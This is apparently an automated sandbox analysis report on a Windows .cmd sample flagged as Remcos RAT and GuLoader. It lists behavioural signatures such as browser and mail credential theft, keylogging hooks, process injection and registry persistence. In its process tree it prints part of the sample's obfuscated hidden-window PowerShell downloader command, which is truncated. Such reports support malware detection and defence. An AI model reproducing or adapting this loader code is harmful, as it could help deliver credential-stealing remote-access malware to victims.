Edit tour
Windows
Analysis Report
rIMG465244247443GULFORDEROpmagasinering.cmd
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 6712 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\rIMG4 6524424744 3GULFORDER Opmagasine ring.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6852 cmdline:
powershell .exe -wind owstyle hi dden " <#S kedekatare r Negligen t Azoparaf fin Cardin alfishes G ermens Asb estinize M ell #>;$Vo rticularly ='Converse d';<#Unabd icated ama germadens Hovedkorte ne arbejds vrelsers I ndehavde S torgaard # >;$Forlbsm odellen=$P aedeutics+ $host.UI; function A bkhasian($ amphivorou s){If ($Fo rlbsmodell en) {$knip sendes++;} $Scythewor k=$Flyingl y+$amphivo rous.'Leng th'-$knips endes; for ( $Idiocyc lophanous= 4;$Idiocyc lophanous -lt $Scyth ework;$Idi ocyclophan ous+=5){$G eometriern e=$Idiocyc lophanous; $Faujdar+= $amphivoro us[$Idiocy clophanous ];$Unstoop ed='Tinnet s';}$Faujd ar;}functi on Yderzon er($modern es){ . ( $Syvtallen e) ($moder nes);}$Ste nbroer=Abk hasian ' , enMAflboUn ,uzStreiRe celProtlMo toaF na/Ov er ';$Sten broer+=Abk hasian 'gl ds5 Ins. m ud0 ,io e v(LeukWOda xiA frnSof fd FdsoOpn awKruksCon v py mNDun sTSt e p y t1Befo0 Fu g.Driv0gy e; Ret E u aWVer iSoc inForu6 Fl a4Pr,b;Rei n m lix Pe 6Cosi4 He m;Syn, Pte rrJakovDuk s:Sv n1V d i3Mine1Opp u.Ambu0mi. u)Quin Un iGKar eGif ,cEnsikSla so Cua/ .u t2stad0Rut e1Semi0 Sa n0 For1Rum .0U se1Tid s ForsF.na tiTar r ei eVaccfExco o.hanxTaff / iel1Unsk 3Haan1Duel .fre 0Baro ';$Genbru gelig=Abkh asian 'Com pUTelts ho lE jleR lg e-CormAE o sGOverEBi dNSemitPro p ';$Brutt onationalp rodukterne s=Abkhasia n ' arch U dbt Aa,tGa llp Fels,v er: Hek/Ha ar/IrakpO oilgrc,i i sne I tl E rrtfor,d I ns.GipstSp awo W rpIc os/ pluUPn eunSothdAn theDommr D okbFa gyre sag ,kogBl okeRecolNo nhsK lkeBa ,p. .hoaGa lgaExotfQu in ';$Marg ueritha=Ab khasian ' epi> Nes ' ;$Syvtalle ne=Abkhasi an 'AftaiF ab E aalxM o i ';$tra ppens='Lob ale207';$I diocycloph anousnhale rende='\Ra fting.Ans' ;Yderzoner (Abkhasia n 'Proc$Si iGMotoLMa anoT.leBFr itaDikaLRe m,:RhyseCa dgMinteB S lyU ,roSDi acq StuUgr unE rte=De e$DendESa mmNSjlevKn ot:KastaKa ,tPAbsipFl andLgdoaud aTAffaALb in+Chur$He maiMongDtr amiPegaoTr adcEnsnYDo wnCKn,gLFo reOFdevPT. onhOli,a e senFallo I ndu EchsEs rNFugthKa ttaUdfoLBi blESpekrVe lmeThyrNHa rmDFdevE U nd ');Yder zoner (Abk hasian 'Ma dk$Hal.gNe .ll AccOK aibC.staFj erlunsu:An disPhilT T nu SugdTi llE OpfNin ciTIntreBl etRKonsB c cRRegidUdd eeMedlTLar y=Glat$Acu pba.barSor tuO,klT Ky ntclubOSca bnPh nAB b bTPhyti Go doAn.inBep aA olLFluo PDimar err OForbD Hyp u U pKS mp t noneKong R,aasnDaa eFodbs.eng .TempS nfp SmoolV lui UranTTh.r( ,eg$ CayM Sec aContr EmanGAutou PluECivir CriniDe eT ryotHAdhsA Cam.) Fld ');Yderzon er (Abkhas ian 'Unca[ Mit.n,ilse QuinTDat . GymnsDuale ZemrMe,nv LibiiEighC VoluE Fusp AlleOBordI andNBurrT ,anzMEdicA Arsen SpoA SnorG ,rne TabsrG li] pre:like: S eS .ntE CantcmisiU Kon RJerni da tKibbY HaruP anaR OrdroKa iT PermoJo rC